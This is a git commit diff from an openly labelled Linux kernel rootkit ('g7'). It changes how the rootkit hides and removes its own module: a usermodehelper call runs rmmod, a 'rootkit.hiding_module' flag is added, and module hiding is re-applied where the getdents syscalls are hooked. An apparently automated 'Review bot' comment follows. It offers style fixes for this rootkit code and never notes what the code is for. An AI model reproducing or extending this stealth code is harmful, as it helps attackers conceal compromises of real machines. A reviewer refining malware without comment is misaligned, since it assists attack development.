
commit 74c031701e4a40b481853236b4324d5b4d691447
parent 2cf933f2f4d97285198b35564c9dd2ef07b86a90
Author: deurzen <m.deurzen@tum.de>
Date:   Sat,  5 Dec 2020 18:30:19 +0100

fixes issues

Diffstat:
Msrc/channel.c | 13+++++++------
Msrc/hook.c | 3+++
2 files changed, 10 insertions(+), 6 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -69,13 +69,10 @@ handle_modhide(unsigned long arg)
 long sarg = (long)arg;
 if (!sarg) {
- char buf[BUFLEN];
- sprintf(buf, "/sbin/rmmod %s", G7_DEVICE);
-
- char *argv[] = {
+ static char *argv[] = {
 "/bin/sh",
 "-c",
- buf,
+ "/sbin/rmmod g7",
 NULL
 };
@@ -91,9 +88,13 @@ handle_modhide(unsigned long arg)
 call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
 } else if (sarg < 0) {
 unhide_module();
- DEBUG_NOTICE("unhiding pid %ld\n", -sarg);
+ rootkit.hiding_module = 0;
+
+ DEBUG_NOTICE("modhide off\n");
 } else if (sarg > 0) {
 hide_module();
+ rootkit.hiding_module = 1;
+ DEBUG_NOTICE("modhide on\n");
 }
diff --git a/src/hook.c b/src/hook.c
@@ -57,6 +57,9 @@ init_hooks(void)
 sys_getdents = (void *)sys_calls[__NR_getdents];
 sys_getdents64 = (void *)sys_calls[__NR_getdents64];
+ if (rootkit.hiding_module)
+ hide_module();
+
 if (rootkit.hiding_files)
 hide_files();
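Review bot: The new `static char *argv[]` in handle_modhide spells the module name out as the literal `"/sbin/rmmod g7"`, whereas the removed sprintf derived it from `G7_DEVICE`, so the two can silently drift apart if the macro is ever changed. If `G7_DEVICE` is a string-literal macro, adjacent-literal concatenation keeps the table static without the buffer: `"/sbin/rmmod " G7_DEVICE,`. The array also stores string literals through non-const `char *` elements; `static char *const argv[]` or a short comment stating that the entries are never written would make the intent explicit. handle_modhide's body continues outside this hunk, and the same literal is the only occurrence in the diff.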